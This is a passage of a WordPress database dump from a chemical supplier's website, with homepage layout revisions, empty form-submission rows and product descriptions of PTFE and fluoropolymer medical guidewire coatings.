INSERT INTO `wp_posts` VALUES (4164, 2, '2017-05-04 19:17:23', '2017-05-04 19:17:23', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4144" bg_size="orginal" bg_color="rgb(198, 215, 230)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" position_x="100" position_y="0"]\n\n[button text="Industrial & medical coatings" size="small" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n[col]\n\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-04 19:17:23', '2017-05-04 19:17:23', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4165, 2, '2017-05-04 19:18:23', '2017-05-04 19:18:23', '[ux_banner_grid height="500" depth="4" depth_hover="3"]\n\n[col span="4"]\n\n[ux_banner height="200px" bg_color="rgb(9, 61, 106)"]\n\n[text_box width="40" width__sm="60" position_y="90"]\n\n[button text="MORE" color="white" style="outline" size="xlarge" link="https://www.miller-stephenson.com/about/"]\n\n\n[/text_box]\n[text_box]\n\n<p class="lead"><strong><span style="font-size: 200%;">SINCE 1955</span></strong></p>\n\n[/text_box]\n[text_box width="79" position_y="20"]\n\n<h3 class="alt-font thin-font"><em><span class="fancy-underline">Innovative Chemical Solutions</span></em></h3>\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="478px" bg="78" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n[text_box width="40" width__sm="60" position_x="0" position_y="0"]\n\n[button text="KRYTOX™ &amp; LUBRICANTS" size="larger" link="https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="242px" bg="957" hover="zoom-long" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n[text_box width="91" width__sm="60" position_x="100" position_y="0"]\n\n[button text="SPECIALTY PRODUCTS &amp; SOLVENTS" size="larger" link="https://www.miller-stephenson.com/specialty-products-solvents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="4"]\n\n[ux_banner height="259px" bg="86" bg_color="rgb(13, 63, 106)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n[text_box width="37" width__sm="60" position_x="100" position_y="0"]\n\n[button text="RELEASE AGENTS" size="larger" link="https://www.miller-stephenson.com/chemicals/release-agents/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="162px" bg="233" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n[text_box width="70" width__sm="60" position_x="100" position_y="0"]\n\n[button text="MEDICAL PRODUCTS" size="larger" link="https://www.miller-stephenson.com/chemicals/medical-chemicals/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="297px" bg="14" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n[text_box width="79" width__sm="60" position_x="100" position_y="0"]\n\n[button text="VAZO RADICAL INITIATORS" size="larger" link="https://www.miller-stephenson.com/chemicals/vazo/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col span="2"]\n\n[ux_banner height="217px" bg="4108" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\n\n[text_box width="66" width__sm="60" position_x="100" position_y="0"]\n\n[button text="EPOXY RESINS" size="larger" link="https://www.miller-stephenson.com/chemicals/epoxy-resins/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col]\n[col_grid span="9" height="1-4"]\n\n[ux_banner height="500px" bg="4144" bg_size="orginal" bg_color="rgb(198, 215, 230)" hover="zoom-long" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n[text_box width="21" position_x="100" position_y="0"]\n\n[button text="Industrial & medical coatings" size="small" link="https://www.miller-stephenson.com/chemicals/industrial-medical-coatings/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n[col_grid span="3" height="1-4"]\n\n[ux_banner height="500px" bg="1932" bg_color="rgb(13, 63, 106)" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n[text_box width="100" position_x="0" position_y="0" text_align="right"]\n\n[button text="CONFORMAL COATINGS" size="larger" link="https://www.miller-stephenson.com/chemicals/conformal-coating/"]\n\n\n[/text_box]\n\n[/ux_banner]\n\n[/col_grid]\n\n[/ux_banner_grid]\n[row]\n\n[col span="3" align="0"]\n\n<h3>Technical Support</h3>\n<p>Our team of industry experts are available to provide you with a level of service and technical knowledge unsurpassed in the market.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Application Experts</h3>\n<p>With over 60 years of knowledge &amp; expertise, Miller Stephenson\'s technical service team can help you find solutions to your manufacturing issues.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Large Inventory</h3>\n<p>With four fully stocked USA and Canadian locations, we are committed to ensuring that our customers can count on swift delivery.</p>\n\n[/col]\n[col span="3"]\n\n<h3>Low Global Warming</h3>\n<p>In response to current and possible future regulations, we offer a large selection of "low global warming" (LGW) products for many applications.</p>\n\n[/col]\n[col]\n\n[ux_banner height="300px" bg="https://imageurl" hover="zoom" effect="sparkle"]\n\n[text_box width="70" width__sm="60" animate="rotateInUpLeft"]\n\n<h4><span class="fancy-underline"><span style="font-size: 95%;"><em>INTRODUCING</em></span></span></h4>\n<h1><strong>ReleaSys </strong></h1>\n<p class="thin-font lead">Our new semi-permanent mold release agents</p>\n[button text="TELL ME MORE" style="gloss" link="https://www.miller-stephenson.com/introducing-releasys-our-newest-release-agent"]\n\n\n[/text_box]\n\n[/ux_banner]\n[gap height="5px"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n[row]\n\n[col span="3"]\n\n[ux_image id="1614" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1618" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2205" image_size="Original"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1617"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2206"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1588"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1620"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="2243"]\n\n\n[/col]\n\n[/row]\n[row]\n\n[col span="3"]\n\n[ux_image id="2208"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1586"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1995"]\n\n\n[/col]\n[col span="3"]\n\n[ux_image id="1580"]\n\n\n[/col]\n\n[/row]\n[gap]\n\n<p>&nbsp;</p>', 'Home', '', 'inherit', 'closed', 'closed', '', '64-revision-v1', '', '', '2017-05-04 19:18:23', '2017-05-04 19:18:23', '', 64, 'https://www.miller-stephenson.com/64-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4166, 0, '2017-05-05 05:48:12', '2017-05-05 05:48:12', '', '', '', 'publish', 'closed', 'closed', '', '4166', '', '', '2017-05-05 05:48:12', '2017-05-05 05:48:12', '', 0, 'https://www.miller-stephenson.com/nf_sub/4166/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4167, 0, '2017-05-05 12:08:18', '2017-05-05 12:08:18', '', '', '', 'publish', 'closed', 'closed', '', '4167', '', '', '2017-05-05 12:08:18', '2017-05-05 12:08:18', '', 0, 'https://www.miller-stephenson.com/nf_sub/4167/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4168, 0, '2017-05-05 17:17:49', '2017-05-05 17:17:49', '', '', '', 'publish', 'closed', 'closed', '', '4168', '', '', '2017-05-05 17:17:49', '2017-05-05 17:17:49', '', 0, 'https://www.miller-stephenson.com/nf_sub/4168/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4169, 0, '2017-05-05 17:25:47', '2017-05-05 17:25:47', '', '', '', 'publish', 'closed', 'closed', '', '4169', '', '', '2017-05-05 17:25:47', '2017-05-05 17:25:47', '', 0, 'https://www.miller-stephenson.com/nf_sub/4169/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (4170, 3, '2017-05-05 18:14:54', '2017-05-05 18:14:54', '<h2><strong>Water-based, Acid Primer PTFE Medical Coatings</strong></h2>\r\n<h3>Highest Performance, Superior Surface Adhesion, World-Class Medical Coatings</h3>\r\nConsider the "Gold Standard" for Water-based, Acid Primer PTFE Medical Coatings, our 850G-90XX represents over 40 years of research, development, and refinement yielding a coating which has no recorded instances of delamination or performance defects. Our PTFE Medical coatings utilize a proprietary, acid primer system allowing for an extremely low coefficient of friction, high durability and surface adhesion in an efficient One-Coat System. Utilization of a water-based system provides a non-flammable and low VOC formula.  Benefits include:\r\n<ul>\r\n 	<li>Water-based; One-coat</li>\r\n 	<li>Non-flammable; Low VOC</li>\r\n 	<li>High surface adhesion and durability</li>\r\n 	<li>No Delamination</li>\r\n 	<li>Passes all ASTM and ISO regulations</li>\r\n 	<li>Lot-to-lot Consistency</li>\r\n</ul>\r\nOur robust adhesion system allows use to maximize surface substantivity and durability while also providing a coefficient of friction rating extremely similarly to that of pure PTFE.  While other companies may open-market source their PTFE, Miller-Stephenson/Chemours is fully back integrated ensuring the highest of quality and supply chain standards.  This in turn provides our customers with the assurance of Lot-to-Lot consistency and a product they can depend upon to delivery the performance they require. Moreover utilization of our water-based PTFE medical coatings minimizes exposure, eliminates flammability, provides a smooth and thin coating to all medical wire. hese formulations generate very uniform, thin films (5-<wbr />10 microns) which exceed all ISO and ASTM requirements.  <span class="C-14">Passes ASTM 1894 Coefficient of Friction; ASTM D3359 Adhesion Test; ISO 7802 Wire Wrap Test; ISO 11070 Corrosion Resistance Test.</span>\r\n<h3>Water-Based PTFE Medical Coatings for Guidewires and Medical Devices</h3>\r\nThese waterbased coatings are formulated with special blends of fluoroplastics and other high-performance resins to improve toughness and abrasion resistance. Because the film components stratify during baking, most of the fluoroplastic properties (such as low friction and nonstick character) are retained. The 850G-90XX medical coatings should be applied to smooth, clean metal. Bake requirements vary, depending on the specific coating.\r\n<h3><span style="font-size: 75%;"><strong>Performance and Facts of PTFE Medical Coatings:</strong></span></h3>\r\n<ul>\r\n 	<li>"Gold Standard" in PTFE Medical Coatings</li>\r\n 	<li>Water-based; One coat system</li>\r\n 	<li>Non-flammable, low VOC</li>\r\n 	<li>One year shelf life stored at room temperature</li>\r\n 	<li>Comparable low coefficient of friction as pure PTFE</li>\r\n 	<li>Dark Green or variety color as requested</li>\r\n 	<li>Coated smooth stainless steel panels passed Adhesion test , ASTM-3359</li>\r\n 	<li>Coated stainless steel catheter guidewires passed flexibility / adhesion tests, ISO 7802 Annex F wrapping test</li>\r\n 	<li>Coated stainless steel catheter guidewires passed corrosion resistance, ISO11070 Annex B, saline soak test</li>\r\n</ul>\r\n<a href="https://www.miller-stephenson.com/medical-guidewire-coatings/">For further information regarding our Medical coatings please see our article section or click here</a>\r\n\r\nhttps://www.youtube.com/watch?v=7v-TgR59CRc', '850G-90XX Waterbased, Acid Primer Fluoropolymer Coating', 'Consider the "Gold Standard" for Water-based, Acid Primer PTFE Medical Coatings, our 850G-90XX represents over 40 years of research, development, and refinement yielding a coating which has no recorded instances of delamination or performance defects. Our PTFE Medical coatings utilize a proprietary, acid primer system allowing for an extremely low coefficient of friction, high durability and surface adhesion in an efficient One-Coat System. Utilization of a water-based system provides a non-flammable and low VOC formula.  Benefits include:\r\n<ul>\r\n 	<li>Water-based; One-coat</li>\r\n 	<li>Non-flammable; Low VOC</li>\r\n 	<li>High surface adhesion and durability</li>\r\n 	<li>No Delamination</li>\r\n 	<li>Passes all ASTM and ISO regulations</li>\r\n 	<li>Lot-to-lot Consistency</li>\r\n</ul>', 'publish', 'closed', 'closed', '', 'ptfe-medical-coatings', '', '', '2017-06-26 00:53:24', '2017-06-26 00:53:24', '', 0, 'https://www.miller-stephenson.com/?post_type=product&#038;p=4170', 0, 'product', '', 0); 
INSERT INTO `wp_posts` VALUES (4171, 3, '2017-06-26 00:52:21', '2017-06-26 00:52:21', '<h2><strong>Water-based, Acid Primer PTFE Medical Coatings</strong></h2>\n<h3>Highest Performance, Superior Surface Adhesion, World-C</h3>\nConsider the "Gold Standard" for Water-based, Acid Primer PTFE Medical Coatings, our 850G-90XX represents over 40 years of research, development, and refinement yielding a coating which has no recorded instances of delamination or performance defects. Our PTFE Medical coatings utilize a proprietary, acid primer system allowing for an extremely low coefficient of friction, high durability and surface adhesion in an efficient One-Coat System. Utilization of a water-based system provides a non-flammable and low VOC formula.  Benefits include:\n<ul>\n 	<li>Water-based; One-coat</li>\n 	<li>Non-flammable; Low VOC</li>\n 	<li>High surface adhesion and durability</li>\n 	<li>No Delamination</li>\n 	<li>Passes all ASTM and ISO regulations</li>\n 	<li>Lot-to-lot Consistency</li>\n</ul>\nOur robust adhesion system allows use to maximize surface substantivity and durability while also providing a coefficient of friction rating extremely similarly to that of pure PTFE.  While other companies may open-market source their PTFE, Miller-Stephenson/Chemours is fully back integrated ensuring the highest of quality and supply chain standards.  This in turn provides our customers with the assurance of Lot-to-Lot consistency and a product they can depend upon to delivery the performance they require. Moreover utilization of our water-based PTFE medical coatings minimizes exposure, eliminates flammability, provides a smooth and thin coating to all medical wire. hese formulations generate very uniform, thin films (5-<wbr />10 microns) which exceed all ISO and ASTM requirements.  <span class="C-14">Passes ASTM 1894 Coefficient of Friction; ASTM D3359 Adhesion Test; ISO 7802 Wire Wrap Test; ISO 11070 Corrosion Resistance Test.</span>\n\nThese waterbased coatings are formulated with special blends of fluoroplastics and other high-performance resins to improve toughness and abrasion resistance. Because the film components stratify during baking, most of the fluoroplastic properties (such as low friction and nonstick character) are retained. The 850G-90XX medical coatings should be applied to smooth, clean metal. Bake requirements vary, depending on the specific coating.\n<h3><span style="font-size: 75%;"><strong>Performance and Facts of PTFE Medical Coatings:</strong></span></h3>\n<ul>\n 	<li>"Gold Standard" in PTFE Medical Coatings</li>\n 	<li>Water-based; One coat system</li>\n 	<li>Non-flammable, low VOC</li>\n 	<li>One year shelf life stored at room temperature</li>\n 	<li>Comparable low coefficient of friction as pure PTFE</li>\n 	<li>Dark Green or variety color as requested</li>\n 	<li>Coated smooth stainless steel panels passed Adhesion test , ASTM-3359</li>\n 	<li>Coated stainless steel catheter guidewires passed flexibility / adhesion tests, ISO 7802 Annex F wrapping test</li>\n 	<li>Coated stainless steel catheter guidewires passed corrosion resistance, ISO11070 Annex B, saline soak test</li>\n</ul>\n<a href="https://www.miller-stephenson.com/medical-guidewire-coatings/">For further information regarding our Medical coatings please see our article section or click here</a>\n\nhttps://www.youtube.com/watch?v=7v-TgR59CRc', '850G-90XX Waterbased, Acid Primer Fluoropolymer Coating', 'Consider the "Gold Standard" for Water-based, Acid Primer PTFE Medical Coatings, our 850G-90XX represents over 40 years of research, development, and refinement yielding a coating which has no recorded instances of delamination or performance defects. Our PTFE Medical coatings utilize a proprietary, acid primer system allowing for an extremely low coefficient of friction, high durability and surface adhesion in an efficient One-Coat System. Utilization of a water-based system provides a non-flammable and low VOC formula.  Benefits include:\n<ul>\n 	<li>Water-based; One-coat</li>\n 	<li>Non-flammable; Low VOC</li>\n 	<li>High surface adhesion and durability</li>\n 	<li>No Delamination</li>\n 	<li>Passes all ASTM and ISO regulations</li>\n 	<li>Lot-to-lot Consistency</li>\n</ul>', 'inherit', 'closed', 'closed', '', '4170-autosave-v1', '', '', '2017-06-26 00:52:21', '2017-06-26 00:52:21', '', 4170, 'https://www.miller-stephenson.com/4170-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4172, 3, '2017-05-05 18:34:50', '2017-05-05 18:34:50', '', 'PTFE Medical Coatings', 'Medical Guidewire Coating using a PTFE coating', 'inherit', 'closed', 'closed', '', 'medical-ptfe', '', '', '2017-05-05 19:42:43', '2017-05-05 19:42:43', '', 4170, 'https://www.miller-stephenson.com/wp-content/uploads/2017/05/MEdical-PTFE.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (4173, 2, '2017-05-05 19:37:22', '2017-05-05 19:37:22', '<h2><strong>Water-based, One-Coat Fluoropolymer Medical Coatings</strong></h2>\nMiller-Stephenson\'s waterbased Fluoropolymer medical coatings are designed to optimize coating adhesion, durability, and corrosion resistance while minimizing coefficient of friction. Our world-class next generation fluoropolymer chemistry delivers unmatched lubricity and adhesion on all medical guide wires. Its lower hazardous classification and stability at ambient temperature also help with handling, application pot-life, and storage conditions.  In practice, medical personnel will feel smooth, low-friction movement as the guidewire progresses through the vasculature. Benefits Include:\n<ul>\n 	<li class="Body">High Durability, Flexibility and Corrosion resistance</li>\n 	<li class="Body">Unmatched Surface Adhesion</li>\n 	<li class="Body">Elimination of Delamination</li>\n 	<li class="Body">Full Back Intergrated raw material manufacturing; Guarantees 100% consistency lot-to-lot</li>\n 	<li class="Body">Substantial safer than Cr(VI) / Acid Primer systems</li>\n 	<li class="Body">Stable to all forms of sterilization</li>\n 	<li class="Body">Passes all ISO and ASTM guidelines*</li>\n</ul>\n<p class="Body"><span class="C-8">Our next generation, acid primer-free, medical coatings are optimized to provide superior adhesion to stainless steel guidewires and other metal wire.  No other product on the market can match the adhesion characteristics and durability of our coating technology. 850G-102X are <span style="text-decoration: underline;">Next-generation</span> fluoropolymer medical coatings by Chemours™ / Miller-Stephenson™ provides excellent adhesion and corrosion protection on a variety of substrates (including stainless steel) while maintaining an extremely low coefficient of friction (high lubricity). These medical guidewire coatings are path forward for companies who want to stay ahead of the Regulatory restriction of Chromium-6 while enhancing consistency, surface adhesion, minimal coefficient of friction on there guidewire or electrocautery medical device  These formulations generate very uniform, thin films (5-<wbr />10 microns) which exceed all ISO and ASTM requirements.  <span class="C-14">Passes ASTM 1894 Coefficient of Friction; ASTM D3359 Adhesion Test; ISO 7802 Wire Wrap Test; ISO Corrosion Resistance Test.</span></span></p>\nThese waterbased coatings are formulated with special blends of fluoroplastics and other high-performance resins to improve toughness and abrasion resistance. Because the film components stratify during baking, most of the fluoroplastic properties (such as low friction and nonstick character) are retained. The 850G-102X medical coatings should be applied to smooth, clean metal. Bake requirements vary, depending on the specific coating.\n<h3 class="Body"><span style="font-size: 75%;"><strong><span class="C-12">Usage Recommendations:</span></strong></span></h3>\n<p class="Body"><span class="C-8">Miller-<wbr />Stephenson\'s PTFE guidewire coatings can be applied via spray or dip methods.  Proper post-<wbr />application curing equipment is critical to guarantee performance and durability. Acceptable curing equipment include high temperature ovens which can safely maintain temperatures of 400-<wbr />800 degree Fahrenheit or IR ovens.</span></p>\n\n<h3><span style="text-decoration: underline; font-size: 75%;"><strong>Performance and Facts of Fluoropolymer Medical Coatings:</strong></span></h3>\n<ul>\n 	<li>No Cr(VI)</li>\n 	<li>Water-based</li>\n 	<li>One coat system</li>\n 	<li>Non-corrosive, non-flammable, low VOC</li>\n 	<li>One year shelf life stored at room temperature</li>\n 	<li>Comparable low coefficient of friction as PTFE- Cr(VI) based coating</li>\n 	<li>Dark Green or variety color as requested</li>\n 	<li>Coated smooth stainless steel panels passed Adhesion test , ASTM-3359</li>\n 	<li>Coated stainless steel catheter guidewires passed flexibility / adhesion tests, ISO11070 Annex F wrapping test</li>\n 	<li>Coated stainless steel catheter guidewires passed corrosion resistance, ISO11070 Annex B, saline soak test</li>\n 	<li>Positive feedback from customer evaluations</li>\n 	<li>Electrocautery medical coatings</li>\n 	<li>Guidewire medical coatings</li>\n</ul>\n<a href="https://www.miller-stephenson.com/medical-guidewire-coatings/">For further information regarding our Medical coatings please see our article section or click here</a>\n\nhttps://www.youtube.com/watch?v=-YyTjhmKcyw\n\n<a href="https://www.miller-stephenson.com/tech-support/">For further information please contact our Technical Service team here</a>', '850G-102X Waterbased Fluoropolymer Coating', 'Our next generation waterbased, Non-Cr(Vi) Fluoropolymer coating, designed to optimize coating adhesion, durability, and corrosion resistance while minimizing coefficient of friction. Our world-class fluoropolymer chemistry delivers unmatched lubricity and adhesion on all medical guide wires in the ease a one-coat system and a safe non-Cr(VI) system.  In practice, medical personnel will feel smooth, low-friction movement as the guidewire progresses through the vasculature. Benefits Include:\n<ul>\n 	<li class="Body">High Durability, Flexibility and Corrosion resistance</li>\n 	<li class="Body">Unmatched Surface Adhesion</li>\n 	<li class="Body">Elimination of Delamination</li>\n 	<li class="Body">Waterbased, One-coat formulation</li>\n 	<li class="Body">No Cr(VI); non-acid primer</li>\n 	<li class="Body">Passes all ISO and ASTM guidelines*</li>\n</ul>', 'inherit', 'closed', 'closed', '', '469-autosave-v1', '', '', '2017-05-05 19:37:22', '2017-05-05 19:37:22', '', 469, 'https://www.miller-stephenson.com/469-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (4174, 2, '2017-05-05 19:43:25', '2017-05-05 19:43:25', '<h2><strong>Water-based, Acid Primer PTFE Medical Coatings</strong></h2>\nConsider the "Gold Standard" for Water-based, Acid Primer PTFE Medical Coatings, our 850G-90XX represents over 40 years of research, development, and refinement yielding a coating which has no recorded instances of delamination or performance defects. Our PTFE Medical coatings utilize a proprietary, acid primer system allowing for an extremely low coefficient of friction, high durability and surface adhesion in an efficient One-Coat System. Utilization of a water-based system provides a non-flammable and low VOC formula.  Benefits include:\n<ul>\n 	<li>Water-based; One-coat</li>\n 	<li>Non-flammable; Low VOC</li>\n 	<li>High surface adhesion and durability</li>\n 	<li>No Delamination</li>\n 	<li>Passes all ASTM and ISO regulations</li>\n 	<li>Lot-to-lot Consistency</li>\n</ul>\nOur robust adhesion system allows use to maximize surface substantivity and durability while also providing a coefficient of friction rating extremely similarly to that of pure PTFE.  While other companies may open-market source their PTFE, Miller-Stephenson/Chemours is fully back integrated ensuring the highest of quality and supply chain standards.  This in turn provides our customers with the assurance of Lot-to-Lot consistency and a product they can depend upon to delivery the performance they require. Moreover utilization of our water-based PTFE medical coatings minimizes exposure, eliminates flammability, provides a smooth and thin coating to all medical wire. hese formulations generate very uniform, thin films (5-<wbr />10 microns) which exceed all ISO and ASTM requirements.  <span class="C-14">Passes ASTM 1894 Coefficient of Friction; ASTM D3359 Adhesion Test; ISO 7802 Wire Wrap Test; ISO Corrosion Resistance Test.</span>\n\nThese waterbased coatings are formulated with special blends of fluoroplastics and other high-performance resins to improve toughness and abrasion resistance. Because the film components stratify during baking, most of the fluoroplastic properties (such as low friction and nonstick character) are retained. The 850G-900X medical coatings should be applied to smooth, clean metal. Bake requirements vary, depending on the specific coating.\n<h3><span style="font-size: 75%;"><strong>Performance and Facts of PTFE Medical Coatings:</strong></span></h3>\n<ul>\n 	<li>"Gold Standard" in PTFE Medical Coatings</li>\n 	<li>Water-based; One coat system</li>\n 	<li>Non-flammable, low VOC</li>\n 	<li>One year shelf life stored at room temperature</li>\n 	<li>Comparable low coefficient of friction as pure PTFE</li>\n 	<li>Dark Green or variety color as requested</li>\n 	<li>Coated smooth stainless steel panels passed Adhesion test , ASTM-3359</li>\n 	<li>Coated stainless steel catheter guidewires passed flexibility / adhesion tests, ISO11070 Annex F wrapping test</li>\n 	<li>Coated stainless steel catheter guidewires passed corrosion resistance, ISO11070 Annex B, saline soak test</li>\n</ul>\n<a href="https://www.miller-stephenson.com/medical-guidewire-coatings/">For further information regarding our Medical coatings please see our article section or click here</a>', '850G-90XX Waterbased, Acid Primer Fluoropolymer Coating', 'Consider the "Gold Standard" for Water-based, Acid Primer PTFE Medical Coatings, our 850G-90XX represents over 40 years of research, development, and refinement yielding a coating which has no recorded instances of delamination or performance defects. Our PTFE Medical coatings utilize a proprietary, acid primer system allowing for an extremely low coefficient of friction, high durability and surface adhesion in an efficient One-Coat System. Utilization of a water-based system provides a non-flammable and low VOC formula.  Benefits include:\n<ul>\n 	<li>Water-based; One-coat</li>\n 	